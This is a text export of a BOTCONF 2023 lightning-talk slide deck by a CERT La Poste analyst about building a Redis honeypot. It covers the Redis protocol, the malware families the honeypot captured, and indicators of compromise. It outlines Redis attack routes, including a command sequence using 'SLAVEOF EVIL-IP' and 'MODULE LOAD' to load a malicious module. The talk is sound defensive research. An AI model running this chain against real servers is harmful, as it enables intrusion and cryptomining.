BOTCONF 2023 - @yarienkiva
Build your own Redis honeypot
-
Aloïs "Alol" de Souza-Coroller
-
@yarienkiva
-
Malware Analyst @CERT La Poste
-
HeroCTF organiser
-
https://heartathack.club
whoami
HeroCTF
12 - 14 / 05
https://blog.aquasec.com/headcrab-attacks-servers-worldwide-with-novel-state-of-art-redis-malware
Redis
Open source, in-memory data store used by millions of developers as a database, cache, streaming engine, and message broker. "Designed to be totally insecure if exposed to the outside world." - antirez
Python
>>> pydict['key'] = 'value' >>> pydict.get('key') value
Redis
127.0.0.1:6379> set key value OK 127.0.0.1:6379> get key "value"
Serialization in Redis
*2\r\n$6\r\nHello,\r\n$11\r\nBotconf2023\r\n
*2 : n° of words $6 : len. of word Hello,: word ...
Hello, Botconf2023
How to pwn a Redis
-
Lua sandbox escape (or other CVE)
-
config set + ssh key/webshell/crontab
-
SLAVEOF + MODULE LOAD
SLAVEOF + MODULE LOAD
set dbfilename backdoor.so
REPLCONF (sync malicious RDB)
MODULE LOAD backdoor.so
SLAVEOF EVIL-IP
Inner workings
if attack: save_binary() return fake result else: return redis result
Results
The honeypot was pushed to prod this morning at 3AM so I haven't had the time to get any interesting results (or sleep), so ...
Free malware!
Results
Kiss-a-dog:
- Coinminer
- Tsunami (Backdoor)
- Backdoor SSH
- Diamorphine (Rootkit)
Watchdog:
- Coinminer
- SSH worm
IOCs
101.43.24.117
106.13.235.167
112.80.35.83
114.112.64.172
117.41.165.40
122.195.53.54
124.221.215.245
150.158.212.175
155.230.135.140
175.178.236.77
180.76.140.118
36.7.69.118
42.193.122.54
43.143.138.177
43.143.31.67
61.144.20.252
66.23.237.139
81.69.196.144
84.201.183.176
hxxp[://]s[.]na-cs[.]com/ hxxp[://]oracle[.]zzhreceive[.]top/ hxxp[://]kiss[.]a-dog[.]top hxxp[://]45[.]83[.]123[.]29/ hxxp[://]en2an[.]top/ c85a554b87aa138e54d646dadde08854dfc461bc 67e05c827ce3e92d394b1f750ab227f222aa505f 1e3f5965bedb8562ac13a487ce956983ecd7cf0c
Thanks for listening
@yarienkiva - Aloïs - CERT La Poste
La Poste recrute ;)
Results
Results
The honeypot was pushed to prod this morning at 3AM so I haven't had the time to get any interesting results (or sleep), so ...
See you next year !
@yarienkiva - Aloïs - CERT La Poste
La Poste recrute ;)
SHOUTBOX :
- HeroCTF V5 12-14/05
- LT done, plz don't fire me Christophe
- Fumiko plz post more music on twitter
honeypot_redis
By Alol dSC
honeypot_redis
- 95